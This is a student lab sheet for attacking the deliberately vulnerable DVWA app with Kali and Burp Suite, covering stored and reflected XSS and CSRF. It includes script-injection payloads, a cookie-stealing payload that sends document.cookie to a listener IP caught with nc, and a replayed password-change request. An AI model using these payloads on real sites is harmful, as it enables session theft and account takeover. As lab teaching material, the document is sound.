Experiment 5 — XSS & CSRF (Execution Chit)

Aim
To perform XSS and CSRF attack testing using DVWA and Burp Suite.

--------------------------------------------------

i) XSS (Cross Site Scripting)

Step 1: Start Machines
- Start Kali Linux VM
- Start Metasploitable2 VM

--------------------------------------------------

Step 2: Open DVWA

Browser:
http://192.168.111.129

Login:
Username: admin
Password: password

--------------------------------------------------

XSS Stored

Step 3: Navigate
DVWA → XSS (Stored)

--------------------------------------------------

Step 4: Normal Input

Name:
Test

Message:
<b>Hello Everyone</b>

Click:
Sign Guestbook

--------------------------------------------------

Step 5: Inject XSS Script

Name:
Hi

Message:
<script>alert("Hello This is XSS")</script>

Click:
Sign Guestbook

Observation:
- Popup alert message appears.
- Stored permanently in page.

--------------------------------------------------

Step 6: Cookie Fetching

Script:
<script>alert(document.cookie)</script>

Observation:
- Displays PHPSESSID cookie value.

--------------------------------------------------

XSS Reflected

Step 7:

Navigate:
DVWA → XSS (Reflected)

Enter:
<script>alert("hello")</script>

Click Submit.

Observation:
- Alert popup displayed.
- Popup disappears after page refresh.

--------------------------------------------------

Cookie Stealing Demo

Step 8:

Enter below payload in XSS Stored message box:

<script>new Image().src="http://192.168.62.128/abc.php?output="+document.cookie;</script>

--------------------------------------------------

Step 9: Start Listener in Kali

nc -lvp 80

Observation:
- Victim cookie captured in Kali terminal.

--------------------------------------------------

ii) CSRF using Burp Suite

Step 1:

Login DVWA:
admin/password

Set Security:
DVWA Security → Low

--------------------------------------------------

Step 2: Launch Burp Suite
- Open Burp Suite
- Configure proxy
- Import Burp certificate

--------------------------------------------------

Step 3:

Navigate:
DVWA → CSRF

Enter:
New Password
Confirm Password

--------------------------------------------------

Step 4:

Enable:
Proxy → Intercept ON

Click:
Change

--------------------------------------------------

Step 5:
- Capture request
- Send to Repeater
- Forward request

Observation:
- Password changed successfully.

--------------------------------------------------

Step 6:

Modify password in Repeater and resend request.

Observation:
- Password changes again without user knowledge.

--------------------------------------------------

Step 7:

Disable:
Intercept OFF

Logout and login again using old password.

Observation:
- Login fails because password changed.

--------------------------------------------------

Result

Successfully performed:
- Stored XSS
- Reflected XSS
- Cookie stealing
- CSRF attack using Burp Suite
